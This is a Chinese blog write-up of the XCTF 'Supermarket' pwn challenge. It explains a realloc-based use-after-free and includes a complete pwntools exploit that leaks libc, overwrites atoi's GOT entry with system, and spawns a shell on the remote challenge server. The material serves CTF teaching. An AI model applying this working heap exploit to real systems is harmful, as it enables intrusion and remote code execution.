攻防世界PWN之Supermarket题解

最新推荐文章于 2022-05-15 01:03:17 发布
最新推荐文章于 2022-05-15 01:03:17 发布
阅读量2.2k 收藏 3
点赞数 3
分类专栏: pwn CTF 二进制漏洞 文章标签: PWN CTF 二进制漏洞 缓冲区溢出 逆向工程
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/seaaseesa/article/details/103093182
版权
pwn 同时被 3 个专栏收录
161 篇文章 24 订阅
订阅专栏
CTF
161 篇文章 9 订阅
订阅专栏
二进制漏洞
161 篇文章 9 订阅
订阅专栏

Supermarket

首先,看一下程序的保护机制。看起来还不错

然后,我们用IDA分析一下

分析出程序大概有这样的一个结构体

  1. typedef struct Node {  
  2.     char name[16];  
  3.     int price;  
  4.     int description_size;  
  5.     char *description;  
  6. } Node;  

 

用来输入的函数

最多只能输入n-1个字符,因此,也不能溢出

删除功能,也对Node指针设置了NULL

 

一切的检查的比较充分,然而,这里出现的漏洞

让我们先看看realloc的知识

 

根据百度百科

realloc原型是extern void *realloc(void *mem_address, unsigned int newsize);

先判断当前的指针是否有足够的连续空间,如果有,扩大mem_address指向的地址,并且将mem_address返回,如果空间不够,先按照newsize指定的大小分配空间,将原有数据从头到尾拷贝到新分配的内存区域,而后释放原来mem_address所指内存区域(注意:原来指针是自动释放,不需要使用free),同时返回新分配的内存区域的首地址。即重新分配存储器块的地址。

 

本程序中,realloc后,并没有把返回值重新赋值给node0->description,因此,当reallocnewsize大于原来的size时,原来区域的空间会被free,由于没有把返回地址赋给node0->description,因此存在UAF漏洞。

并且,由于创建node时,是先malloc node结构体,然后再malloc description的空间,所以,当我们再次申请创建一个node时,如果满足条件,node结构体就会申请到node0->description,然后,我们编辑node0description就是编辑node1的结构体,我们把node1description指向atoigot表,我们就可以实现泄露atoi的地址以及修改atoiGOT表。

 

注意,我们的node0description的大小必须为unsorted bin,因为,这样我们才能让node2的结构体申请到node0->description处,因为结构体空间大小为0x1C,刚好满足小于node0->description地址处空间的大小,可以从中切割区域。如果要使用fastbin的话,是不可行的,因为fastbin是当要申请的空间大小和空闲的空间大小一模一样时,才能分配到那个空闲的块处,假如我们设置的大小为0x1C,但是本题的用来获取输入的函数最多只能输入n-1个字符,最后一个字符会强制设置为0而我们要把atoigot表地址覆盖到node2->description,由于该字段位于结构体最后,因此,我们将会覆盖不完整。所以,我们使用unsorted bin。(请仔细思考一下)

 

当我们成功修改了node2的结构体时,我们就成功了八成了。只要我们把node2-> description指向atoi的got表,那么我们编辑node2的description时就是在编辑atoi的got表

综上,我们最终的exp脚本如下

  1. #coding:utf8  
  2. from pwn import *  
  3. from LibcSearcher import *  
  4.   
  5. #sh = process('./supermarket')  
  6. sh = remote('111.198.29.45',55879)  
  7. elf = ELF('./supermarket')  
  8. atoi_got = elf.got['atoi']  
  9.   
  10. def create(index,size,content):  
  11.    sh.sendlineafter('your choice>>','1')  
  12.    sh.sendlineafter('name:',str(index))  
  13.    sh.sendlineafter('price:','10')  
  14.    sh.sendlineafter('descrip_size:',str(size))  
  15.    sh.sendlineafter('description:',content)  
  16.   
  17. def delete(index):  
  18.    sh.sendlineafter('your choice>>','2')  
  19.    sh.sendlineafter('name:',str(index))  
  20.   
  21. def show():  
  22.    sh.sendlineafter('your choice>>','3')  
  23.   
  24. def edit(index,size,content):  
  25.    sh.sendlineafter('your choice>>','5')  
  26.    sh.sendlineafter('name:',str(index))  
  27.    sh.sendlineafter('descrip_size:',str(size))  
  28.    sh.sendlineafter('description:',content)  
  29.   
  30. #node0  
  31. create(0,0x80,'a'*0x10)  
  32. #node1,只用来做分隔作用,防止块合并  
  33. create(1,0x20,'b'*0x10)  
  34. #realloc node0->description  
  35. #注意不要加任何数据,因为我们发送的数据写入到的是一个被free的块(仔细思考一下这句话),这会导致后面malloc时出错  
  36. edit(0,0x90,'')  
  37. #现在node2将被分配到node0的原description  
  38. create(2,0x20,'d'*0x10)  
  39. payload = '2'.ljust(16,'\x00') + p32(20) + p32(0x20) + p32(atoi_got)  
  40. #由于没有把realloc返回的指针赋值给node0->description,因此node0->description还是原来那个地址处,现在存的是node1  
  41. #因此edit(0)就是编辑node1的结构体,我们通过修改,把node1->description指向atoigot  
  42. edit(0,0x80,payload)  
  43. #泄露信息  
  44. show()  
  45. sh.recvuntil('2: price.20, des.')  
  46. #泄露atoi的加载地址  
  47. atoi_addr = u32(sh.recvuntil('\n').split('\n')[0].ljust(4,'\x00'))  
  48.   
  49. libc = LibcSearcher('atoi',atoi_addr)  
  50. libc_base = atoi_addr - libc.dump('atoi')  
  51. system_addr = libc_base + libc.dump('system')  
  52. #修改atoi的表,将它指向system  
  53. edit(2,0x20,p32(system_addr))  
  54. #getshell  
  55. sh.sendlineafter('your choice>>','/bin/sh')  
  56.   
  57. sh.interactive()  
ha1vk
关注
  • 3
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 3
    评论
专栏目录
PWN系列】攻防世界 supermarket 题解
Vicl1fe的博客
10-30 438
个人博客地址 http://www.darkerbox.com 欢迎大家学习交流 参考网址: https://blog.csdn.net/seaaseesa/article/details/103093182 https://blog.csdn.net/qq_44370676/article/details/108229050(较详细) 分析 大概看了一个,是一个商品系统。一个商品含有名字、价格、描述,并且程序有五个功能 : 1、添加商品 2、删除商品 3、展示商品 4、修改商品价格 5、修改商品的
realloc函数UAF利用|攻防世界pwn进阶区supermarket
Kni9hT's Blog
03-21 844
文章目录思路0x00.tar解压0x01.查看保护0x02.查看程序并调试0x03.漏洞分析realloc函数详解0x04.利用思路利用过程exp编写 思路 0x00.tar解压 下载获得压缩包文件,解压之后放进ubuntu中发现还是一个tar格式压缩包。 tar -xf filename 附:linux下tar命令详解 解压得到一个libc.so.6的库和一个可执行文件 0x01.查看保护 ...
攻防世界学习笔记2022.5.15
u014377094的博客
05-15 545
dubblesort 32位栈题,保护开的很全,有canary保护 canary处有偏移,并不是直接ebp+4 学习点: 1.使用+-号跳过scanf,防止对canary位修改 示例,如输入+,并不会对内容修改。 2. puts函数往往会存在利用,因为以0为结尾读取,所以往往拿来泄露地址。 该题采用泄露buf中的地址来获得libc基址。不过buf中为何会有关于这些的残留,暂且不知,可能是之前同等级函数调用时残留在栈中的数据? 3.关于脚本交互。 注意什么时候u32,什么时候str(),
攻防世界 Pwn 进阶 第一页
yongbaoii的博客
10-19 2957
写在最前面 我在某天中午睡了一觉之后大彻大悟 我感觉pwn最重要的是能不能找得到漏洞点,学会怎么利用这个漏洞点以及明白他的原理倒是要往后放一放,所以要来一个漏洞总结,总结我现在见到过的所有漏洞漏洞的原理以及它的表现形式,就在攻防世界第一页之后吧,以题的形式去进行一些总结。 00 要把它跟之前新手区的放在一起总结,先稍稍回顾一下新手区。 攻防世界 Pwn 新手 1、栈溢出,从简单到难,开始有后门函数,到需要自己写函数参数,到最后的ret2libc。 常见漏洞点有read()函数、gets()函数、strca
uaf-逻辑题-攻防世界 supermarket
csdn546229768的博客
11-30 360
刚开始我也被这题绕晕了,做这种题要画图画图!!!不然很容易做着做着忘了自己做到哪里来了 本题环境是ubuntu16、glib2.23!!!我第一次做的时候用的ubuntu18也就是glib2.27这时有tcache freechunk的分配策略不一样死活跑不出来,这题我还要研究一下tcache版本的。 首先申请了一个不在fastbin范围(0x10~0x58)的chunk0,然后再申请一个随便大小的chunk1,解释:因为下面我将要用remalloc重新分配chun0,remalloc如果重新分配的ch
攻防世界高手进阶区 ——实时数据检测
weixin_62675330的博客
02-13 1179
攻防世界高手进阶区 ——实时数据检测 1.分析文件 先checksec一下 发现啥都没有开,完全就是裸奔。 运行一下[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传 运行发现就是想要把key的值改为0x2223322。 直接上ida int locker() { char s[520]; // [esp+0h] [ebp-208h] BYREF fgets(s, 512, stdin); imagemagic(s);
攻防世界supermarket
qq_44370676的博客
08-25 348
首先检查保护机制 然后运行一下 是一个菜单题,接着往下看 可以看到,选项3会按行打印出每个商品的信息,在des.后面就是商品的description 接着IDA分析 首先看看sub_8048864() sub_8048812就是读入一串字符串到nptr,这一块并没有溢出点,但是这里并不是以%d的方式输入数字,而是先输入字符串然后用atoi函数转换,如果能够修改atoi的got表为system并且输入/bin/sh那么我们的目的便达成了。接着往下看,看能不能实现这.
攻防世界pwn supermarket
qq_42728977的博客
03-18 444
supermarket degree of difficulty: 3 source of the challenges: CISCN-2018-Quals solving ideas:reaclloc \UAF ok, put it in IDA. Got the breaking point of it: this function’s introduction: all in all ,...
攻防世界pwn supermarket + 实时数据监测
PLpa的博客
02-13 885
supermarket 这是一个典型的堆题,菜单类型。 只开了NX保护的32位程序。 我们来分析一下程序 程序实现了增删改查,其中改可以改价格和商品的描述,我们重点看改描述,因为程序的漏洞就在这里。 首先让我们输入商品的名字,通过名字来找到商品,这里我们就可以伪造商品了。继续往下看会看到程序让我们输入描述信息的size。通过程序分析我们知道(&s2)[v1]+5是结构体中存储堆的si...
攻防世界PWN之RCalc题解
seaaseesa的博客
11-19 1349
RCalc 首先,检查一下程序的保护机制,还不错,只开了NX 然后,我们用IDA分析 看到这,感觉像是堆的题,应该会很复杂。然而,我们再看看其他地方,发现这个函数只是在初始化时调用的,也不太可能会被利用,而且程序全程没有调用free函数 然后,我们瞧瞧其他函数,看到这里感觉好复杂,然而,它只是一个用来生成随机数的函数罢了 然后,我们继续看其他函数 这个样子,好像是can...
OMNET++4.0 RC4算法
07-20
用OMNET++4.0编写的RC4算法,可直接移植。(注:不是文档,只能在omnet++4.0下使用)
攻防世界pwn题:Recho.doc
07-13
攻防世界pwn题:Recho.doc
攻防世界pwn题:forgot.doc
07-13
攻防世界pwn题:forgot.doc
level0 -- 攻防世界新手题
01-19
来自攻防世界pwn题,是一道简单的新手样本题目,但由于不同linux的libc版本,会使得在ubuntu18.04以及ubuntu20.04中进行漏洞利用产生一些小问题。漏洞利用问题解决链接:...
【广东大学生网络攻防大赛】Pwn | jmp_rsp 题目附件
05-24
【广东大学生网络攻防大赛】Pwn | jmp_rsp 题目附件
Pwn】fuzzerinstrospector(首届数字空间安全攻防大赛)
07-16
首届数字空间安全攻防大赛
jedis示例代码压缩包
04-23
jedis示例代码
高分课程设计 QT5.7+Sqllite数据库小系统源码+部署文档+全部数据资料
最新发布
04-23
【资源说明】 高分课程设计 QT5.7+Sqllite数据库小系统源码+部署文档+全部数据资料 可实现数据库的可视化操作:增、删、改、查.zip 【备注】 1、该项目是高分毕业设计项目源码,已获导师指导认可通过,答辩评审分达到95分 2、该资源内项目代码都经过mac/window10/11/linux测试运行成功,功能ok的情况下才上传的,请放心下载使用! 3、本项目适合计算机相关专业(如软件工程、计科、人工智能、通信工程、自动化、电子信息等)的在校学生、老师或者企业员工下载使用,也可作为毕业设计、课程设计、作业、项目初期立项演示等,当然也适合小白学习进阶。 4、如果基础还行,可以在此代码基础上进行修改,以实现其他功能,也可直接用于毕设、课设、作业等。 欢迎下载,沟通交流,互相学习,共同进步!
中文文本分类 传统机器学习+深度学习.zip
04-23
中文文本分类 传统机器学习+深度学习
攻防世界 pwn repeater
09-13
攻防世界是一个CTF竞赛平台,其中包含了各种类型的题目,包括pwn和repeater题目。根据引用中提到的信息,攻防世界标记的难度可能不准确。这可能是因为题目的实际难度与标记的难度不一致,导致出现了这种情况。 至于repeater题目,根据引用中提供的代码,该题目涉及到了远程攻击和内存溢出的技术。代码中使用了pwn工具包来进行远程连接和漏洞利用。通过发送一段恶意输入,攻击者可以覆盖程序的返回地址,使得程序执行恶意的shellcode。 具体地说,代码中通过发送一系列的输入,包括恶意shellcode,使得程序发生内存溢出,覆盖了主函数的返回地址,从而让主函数正常退出,并跳转到shellcode的首条指令处。 在此过程中,使用了pwn工具包中的一些功能,如远程连接、编码shellcode等。代码中也展示了一些具体的操作步骤,如发送输入、计算地址等。 综上所述,攻防世界中的pwn和repeater题目分别涉及到了漏洞利用和内存溢出的技术。通过精心构造的输入,攻击者可以利用程序的漏洞来执行恶意代码。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值